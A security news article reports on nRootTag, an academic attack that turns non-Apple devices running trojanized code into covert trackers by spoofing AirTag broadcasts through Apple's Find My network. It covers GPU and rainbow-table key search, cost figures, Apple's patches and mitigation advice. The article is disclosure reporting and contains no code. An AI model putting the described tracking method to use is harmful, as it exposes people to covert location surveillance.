A new attack dubbed nRootTag has exposed over 1.5 billion Apple devices, including iPhones, iPads, Apple Watches, and Macs, to covert tracking by malicious actors.
To be Detailed in a forthcoming USENIX Security Symposium 2025 paper by researchers Junming Chen, Xiaoyue Ma, Lannan Luo, and Qiang Zeng, the attack exploits Apple’s Find My network to transform non-Apple devices into stealthy tracking beacons without requiring root access.
The exploit, which leverages Bluetooth Low Energy (BLE) protocols, poses unprecedented risks to global privacy.
How nRootTag Hijacks Apple’s Find My Network
Apple’s Find My network, designed to locate lost devices using crowdsourced Bluetooth signals from nearby Apple products, relies on encrypted “lost messages” broadcast by AirTags.
These messages are relayed to the Apple Cloud by nearby devices, allowing owners to retrieve location data. The nRootTag attack bypasses this system’s safeguards by spoofing legitimate AirTag broadcasts.
The attack begins with trojanized code installed on a target device—such as a Windows PC, Android phone, or Linux-based IoT gadget.
This code harvests the device’s BLE advertising address and requests a matching public/private key pair from an attacker-controlled server. Once configured, the device broadcasts forged “lost messages” distinct from genuine AirTag signals.
Nearby Apple devices, acting as unwitting “finders,” relay these messages to Apple’s servers, enabling attackers to track the device’s real-time location.
The researchers developed two methods to generate valid cryptographic keys: rainbow table precomputation and on-the-fly GPU-assisted key searches.
A precomputed rainbow table enables instant key retrieval, while GPU clusters such as NVIDIA’s RTX 3080 or data center-grade A100 can brute-force keys at speeds exceeding 2.1 million keys per second.
This efficiency reduces attack costs to “under $5 per target” while achieving a 90% success rate within minutes.
Notably, the exploit’s cross-platform compatibility extends to smartwatches, laptops, and medical IoT devices, amplifying its threat surface.
Patches and Persistent Risks
Apple has released patches in iOS 18.2, macOS Sequoia 15.2, and other updates to mitigate nRootTag.
However, the fix only prevents patched Apple devices from relaying malicious signals. With over 1.5 billion active devices globally—many running outdated software—the attack remains viable. “As long as unpatched iPhones exist nearby, the tracking chain persists,” the paper notes.
The NSF and Commonwealth Cyber Initiative-funded study urges enterprises to segment Bluetooth traffic and enforce strict device authentication.
For consumers, immediate software updates are critical. Yet, the researchers caution that nRootTag’s low cost and scalability make it “inevitable for cybercriminal adoption.”
nRootTag underscores systemic flaws in crowdsourced tracking networks. By exploiting trust in Apple’s ecosystem, the attack erodes anonymity guarantees and demonstrates how benign infrastructure can be weaponized.
As Bluetooth-enabled devices proliferate, the study calls for re-evaluating offline finding systems’ cryptographic designs—before malicious tracking becomes endemic.
Apple has not commented beyond acknowledging the researchers’ disclosure. With the exploit’s blueprint now public, the fight to safeguard billions of devices has just begun.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free